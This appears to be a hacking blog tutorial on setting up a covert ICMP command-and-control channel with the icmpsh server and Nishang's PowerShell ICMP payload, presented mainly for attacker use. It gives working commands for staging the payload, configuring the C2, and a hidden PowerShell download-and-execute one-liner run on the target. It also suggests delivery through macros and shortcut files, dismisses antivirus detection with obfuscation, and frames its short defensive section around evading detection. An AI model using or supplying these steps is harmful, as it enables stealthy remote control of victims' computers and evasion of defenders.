Slack Group
Before we get started I have started a slack group dedicated to hacking. We welcome everyone from beginner to advanced to join. I will be on everyday answer questions, doing CTFs, and talking about cool hacks. If you enjoy hacking and are looking for like minded people join below:
Introduction
In order to control your backdoors, trojans, and botnets you need to have a command and control server. The vast majority of these are designed to communicate over HTTP protocol. In some cases your communication protocol might be blocked or you just might want a stealthy alternative to the traditional communication protocols. ICMP is one of those protocols that the defenders might not expect, after all who would create a backdoor that communicates over ping. APT 32 also known as Cobalt Kitty is one threat actor that has been using ICMP backdoors, one is named PHOREAL ( https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html). This communication protocol is attractive because very few people are looking at it.
Downloads
ICMPSH Server
Icmpsh is an open source command and control server. As you can guess this C2 operates over ICMP. Though this tool was coded about 8 years ago it still works great for single case scenarios. If you plan on gathering a bunch of targets and having them communicate with this C2 then the tool will fail as its designed to communicate with one target at a time.
Nishang ICMP Payload
Nishang is a collection of hacking scripts written in powershell. These scripts are heavily used by penetration testers on a daily bases so dont be confused if it gets picked up by anti viruses, thats what obfuscation is for any ways. The script we are interested in is located at /Shells/Invoke-PowerShellIcmp.ps1
The Attack
Preparation
After you have downloaded the ICMPSH server and the Nishang payload you need to get things up and running. In this attack scenario the target will connect to our box to pull down the payload and execute it. This means we must host our attack script so it can be downloaded.
We can use the following command to start a http server on port 80:
python -m SimpleHTTPServer 80
Make sure when starting this server you are in the nishang/Shells folder as shown below:
Now that we have our payload hosted on our server we can start the ICMPSH command and control server. This server is where the powershell payload will connect to.
Before starting the C2 server we must configure our machine to not respond to ping request. To do this open a new terminal and type the following command:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
Like I had previously mentioned this C2 server can only communicate with one target at a time. So when starting the server we must give our IP as well as the targets IP as shown below:
python icmp_m.py your-ip target-ip
Now that you have your payload staged and your C2 listening you are ready to play the game.
ICMPSH
Once the payload is staged and the C2 is listening the target has to download and execute the payload. To execute the icmp payload on the target machine you can enter the following command in the targets command prompt:
powershell -w hidden “IEX (New-Object System.Net.Webclient).DownloadString(‘http://your-ip/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress your-ip”
This is not the only means of executing the back door. You can embed similar commands in Microsoft macros, lnk/shortcut files, vbs scripts, and much more. You just need to get the target to download and execute your powershell payload.
Once the command is entered it will make the command prompt hidden in the background. Next the payload will download the backdoor from the simpleHTTPServer that was set up earlier. Once downloaded it will be executed and the kali box will receive a connection from the target machine as shown below:
Thats it you now have a powershell shell that is being tunneled through ICMP.
Defensive view
Its always a good idea to see what the enemy(blue team) sees when they are looking for you. If your not aware of this type of attack you might completely miss it. If you are aware it becomes easier to spot by looking at the network traffic as shown below:
As you can see its hard to miss a million icmp packets going to and from the same source, but actually in a very large network with lots of traffic you might actually miss this. Still though this just isnt normal behavior, I dont know about you but my computer doesnt normally send this many ICMP packets in a row to the same source. Thats why as an attacker this communication protocol is best used as an emergency or secondary C2 channel. It most likely wont get picked up if its only reaching out a few times a day.
Conclusion
When on an engagement its always good to have a backup C2 channel running along side your main backdoor. ICMP is a good and stealthy alternative to HTTP,IRC, and raw tcp sockets. A lot of defenders just arnt looking for it so it tends to fly under the radar.
